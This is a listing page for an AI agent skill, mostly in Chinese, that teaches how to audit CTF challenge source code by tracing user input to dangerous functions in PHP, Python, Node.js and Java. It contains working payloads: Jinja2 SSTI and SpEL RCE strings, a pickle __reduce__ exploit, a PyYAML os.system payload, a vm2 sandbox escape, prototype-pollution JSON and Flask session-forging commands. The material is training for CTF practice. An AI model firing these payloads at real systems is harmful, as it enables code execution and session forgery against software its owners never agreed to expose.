ctf-source-audit

Name: ctf-source-audit
Author: wgpsec/AboutSecurity

$npx mdskill add wgpsec/AboutSecurity/ctf-source-audit

Audit CTF source code by tracing inputs to dangerous sinks.

Identifies intentional vulnerabilities in limited CTF challenges.
Recognizes exposed files like .git, .bak, and /proc/self/environ.
Maps input sources to dangerous functions across PHP, Python, Node.js, and Java.
Outputs clear audit paths highlighting critical vulnerability points.

SKILL.md

.github/skills/ctf-source-auditView on GitHub ↗

---
name: ctf-source-audit
description: "CTF 挑战中的源码审计方法。当发现 .git 目录、.bak/.zip 备份、/proc/self/environ 泄露源码时使用。与真实代码审计不同——CTF 源码中的漏洞是故意设置的，通常只有 1-2 个关键点。先找危险函数（sink），再追溯输入（source）到该函数的路径。覆盖 PHP/Python/Node.js/Java 四种语言的危险函数和漏洞模式"
metadata:
  tags: "ctf,source,audit,code review,源码审计,php,python,node,java,代码审计,SAST"
  category: "ctf"
---

# CTF 源码审计方法论

CTF 源码审计 ≠ 真实代码审计。区别：
- 真实审计：几万行代码，漏洞可能在任何地方
- CTF 审计：**几十到几百行代码，漏洞是故意设置的，通常很明显**

核心策略：**找危险函数**（sink），然后追溯输入（source）到危险函数的路径。

## ⛔ 深入参考（必读）

- PHP/Python/Node.js/Java 完整危险函数清单、漏洞模式 → [references/dangerous-functions.md](references/dangerous-functions.md)

## Phase 1: 快速识别语言和框架

| 特征 | 语言/框架 |
|------|-----------|
| `.php` 文件、`<?php` | PHP |
| `app.py`、`from flask`、`import django` | Python (Flask/Django) |
| `package.json`、`require()`、`app.js` | Node.js (Express) |
| `pom.xml`、`.java`、`@Controller` | Java (Spring) |
| `go.mod`、`func main()` | Go |

## Phase 2: 审计流程

### 2.1 快速定位危险函数

| 语言 | 命令执行 | 反序列化 | 模板注入 | 文件操作 |
|------|----------|----------|----------|----------|
| PHP | `system()` `eval()` `exec()` `passthru()` | `unserialize()` | N/A | `include()` `file_get_contents()` |
| Python | `os.system()` `eval()` `exec()` `subprocess` | `pickle.loads()` `yaml.load()` | `render_template_string()` | `open()` |
| Node.js | `child_process.exec()` `eval()` | N/A | EJS/Pug inject | `fs.readFile()` |
| Java | `Runtime.exec()` `ProcessBuilder` | `ObjectInputStream` | SpEL/FreeMarker | `FileInputStream` |

→ 完整危险函数清单 → [references/dangerous-functions.md](references/dangerous-functions.md)

### 2.2 追踪数据流（sink → source）

1. **参数从哪来？** — `$_GET`, `request.args`, `req.body`, `@RequestParam`
2. **有没有过滤？** — 搜 `filter`, `sanitize`, `escape`, `replace`, `blacklist`
3. **过滤能绕过吗？** — CTF 中通常有绕过（黑名单遗漏、双重编码、大小写、数组绕过）

### 2.3 审计产出
1. 漏洞类型和位置（文件名+行号）
2. 利用方法（构造什么请求触发）
3. Flag 获取路径

## Phase 3: PHP 常见漏洞模式

### 弱比较 (`==` vs `===`)

```php
// 0e 开头的字符串在 == 比较时被当作科学计数法，等于 0
if ($_GET['password'] == '0e123456') { ... }  // 输入 "0" → true
if (md5($a) == md5($b)) { ... }  // 找两个 md5 以 0e 开头的值

// 0e MD5 碰撞值：
// md5("240610708")  = 0e462097431906509019562988736854
// md5("QNKCDZO")    = 0e830400451993494058024219903391
// md5("s878926199a") = 0e545993274517709034328855841020

// 数组绕过 ===
if ($a != $b && md5($a) === md5($b)) { ... }
// md5(array) 返回 NULL → a[]=1&b[]=2
```

### 变量覆盖

```php
extract($_GET);  // GET 参数覆盖任意变量
parse_str($str); // 解析字符串为变量（无第二个参数时）
$$key = $value;  // 可变变量

// 利用：?admin=1 覆盖 $admin 变量
```

### PHP 类型戏法

```php
// intval() 截断
intval("123abc") === 123  // 非数字部分被忽略
intval("0x1A") === 0      // PHP 7 不解析 hex（PHP 5 可以）

// is_numeric() 绕过
is_numeric("0x539") → true (PHP 5)
is_numeric("1e5") → true   // 科学计数法

// in_array() 松散比较
in_array(0, ['a','b','c']) → true  // 0 == 'a' 在松散比较中为 true（PHP 7 以下）
// 修复：in_array(0, ['a','b','c'], true) 第三个参数=strict
```

### preg_replace /e (PHP < 7.0)

```php
preg_replace('/.*/e', 'system("id")', '');  // /e 修饰符执行替换结果
```

### 反序列化 POP 链

搜索 `__wakeup()`, `__destruct()`, `__toString()` 魔术方法，构造链式调用。

```php
// __wakeup 绕过：序列化字符串中属性个数大于实际值
O:4:"User":3:{...}  // 实际只有 2 个属性，写 3 → 跳过 __wakeup
// 适用 PHP 5.x - 7.0.10
```

## Phase 4: Python 常见漏洞模式

### Flask Session 伪造

```python
# 如果知道 SECRET_KEY，可以伪造 Flask session
# 工具：flask-unsign
flask-unsign --decode --cookie 'SESSION_COOKIE'
flask-unsign --sign --cookie "{'user':'admin'}" --secret 'SECRET_KEY'

# SECRET_KEY 泄露路径：
# - 源码中硬编码
# - /proc/self/environ 中的环境变量
# - config.py / .env 文件
```

### Werkzeug Debug PIN 计算

```python
# 当 Flask DEBUG=True 时，/console 需要 PIN
# PIN 计算因素（全部可通过 LFI 获取）：
# 1. username: /etc/passwd 中运行 Flask 的用户
# 2. modname: 通常是 "flask.app"
# 3. appname: 通常是 "Flask"
# 4. modpath: flask/app.py 的路径 → /proc/self/cmdline + find
# 5. MAC 地址: /sys/class/net/eth0/address → 转十进制
# 6. machine-id: /etc/machine-id + /proc/self/cgroup (Docker)

# 计算脚本见 ctf-web-methodology 的 server-side-advanced.md
```

### SSTI (Jinja2)

```python
render_template_string(user_input)  # 危险！
# 检测：{{7*7}} → 49
# RCE：{{lipsum.__globals__.__builtins__.__import__('os').popen('id').read()}}
```

### Pickle 反序列化 RCE

```python
import pickle, base64, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('cat /flag.txt',))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
```

### PyYAML 不安全加载

```python
yaml.load(data)  # 不安全！需要 yaml.safe_load()
# payload: !!python/object/apply:os.system ['cat /flag.txt']
```

## Phase 5: Node.js 常见漏洞模式

### 原型链污染

```javascript
// 危险函数：Object.assign(), _.merge(), _.set(), 递归合并
// payload: {"__proto__":{"isAdmin":true}}
// 或: {"constructor":{"prototype":{"isAdmin":true}}}

// 利用场景：
// 1. 修改 Object.prototype 影响全局
// 2. 覆盖已有属性（role: admin）
// 3. RCE：污染 child_process 的 env/shell
```

### require() 路径穿越

```javascript
// 如果用户控制 require() 参数
require('../../../etc/passwd');  // 虽然不执行但可泄露错误信息
require('/proc/self/environ');
```

### eval() / vm 逃逸

```javascript
// vm2 沙箱逃逸（多个 CVE）
const {VM} = require("vm2");
const vm = new VM();
vm.run('this.constructor.constructor("return process")().mainModule.require("child_process").execSync("id").toString()');
```

## Phase 6: Java 常见漏洞模式

### SpEL 注入 (Spring)

```java
// 如果用户输入被嵌入 SpEL 表达式
// 检测：${7*7} → 49 或 #{7*7} → 49
// RCE：
#{T(java.lang.Runtime).getRuntime().exec("id")}
```

### XXE (Java XML 解析)

Java 的 XML 解析器默认不禁用外部实体（需要手动设置），是 XXE 高发区。

### 反序列化（ObjectInputStream）

搜索 `ObjectInputStream.readObject()` → 配合 ysoserial 生成 payload。

## 注意事项

- CTF 源码通常很短（<200行），不要用复杂工具，手动审计即可
- 优先搜索 `flag`、`secret`、`admin` 关键字
- 注意注释中的提示（CTF 出题者有时会留线索）
- 多文件项目：先看路由（`app.py` / `index.php` / `app.js`），再看控制器逻辑

More from wgpsec/AboutSecurity

Skill	Description
401-403-bypass	401/403 访问拒绝绕过方法论。当遇到管理后台、API 端点返回 401/403 Forbidden 时使用。覆盖路径操纵、HTTP 方法篡改、Header 注入、协议降级、组合攻击
ad-acl-abuse	Active Directory ACL 滥用攻击方法论。当 BloodHound 发现 GenericAll/WriteDACL/WriteOwner/GenericWrite/ForceChangePassword 等危险 ACE 时使用。覆盖 ACE 枚举、权限滥用链、Shadow Credentials、RBCD 攻击
ad-delegation-attack	Kerberos 委派攻击（非约束/约束/RBCD）。当 BloodHound 发现委派配置、或已获取有 SPN 的服务账号/机器账号控制权时使用。通过 S4U 协议滥用可实现跨服务模拟任意用户，常用于域内权限提升和横向移动。
ad-domain-attack	Active Directory 域环境攻击全链路。当目标主机在域环境中（systeminfo 显示 Domain 非 WORKGROUP）、发现 88/389/636 端口、或获取到域用户凭据时使用。覆盖域信息收集、用户枚举、Kerberoasting、AS-REP Roasting、委派攻击、ACL 滥用、DCSync、Golden/Silver Ticket
ad-persistence	AD 域环境持久化技术。当已获取域管/本地管理员权限、需要建立持久访问以确保重启或密码更改后仍能回到目标环境时使用。覆盖主机级持久化（计划任务/注册表Run/COM劫持/WMI事件订阅/Windows服务/启动文件夹）、域级持久化（Golden Ticket/Silver Ticket/Skeleton Key/DSRM/AdminSDHolder）、DCShadow/GoldenGMSA高级技术、清理命令与检测规避
ad-trust-attack	域信任关系攻击。当目标存在多域/多林环境时使用。包含父子域提权（Golden Ticket + ExtraSid）、跨林攻击（SID History/MSSQL Trust Links）、单向信任利用。已获取子域 Domain Admin 或发现信任关系时优先加载。
adcs-certipy-attack	Active Directory Certificate Services (ADCS) 证书攻击。当发现域内有 CA 服务器、ADCS Web Enrollment、证书模板配置错误时使用。覆盖 ESC1-ESC11 所有证书滥用路径、Certipy 工具链、证书伪造、NTLM 中继到 ADCS。发现 ADCS/CA/证书/certsrv 相关内容时一定要使用此技能
adinfo-enum	使用 Adinfo 进行 Active Directory 信息收集。当获得域用户凭据后需要快速收集域环境信息时使用。Adinfo 是一个快速 AD 信息收集工具，一条命令输出域控列表、域管用户、信任关系、GPO、SPN、委派配置等关键信息——比手动 LDAP 查询快得多。发现域环境后第一步信息收集使用此技能
agent-security	\|
ai-data-security	\|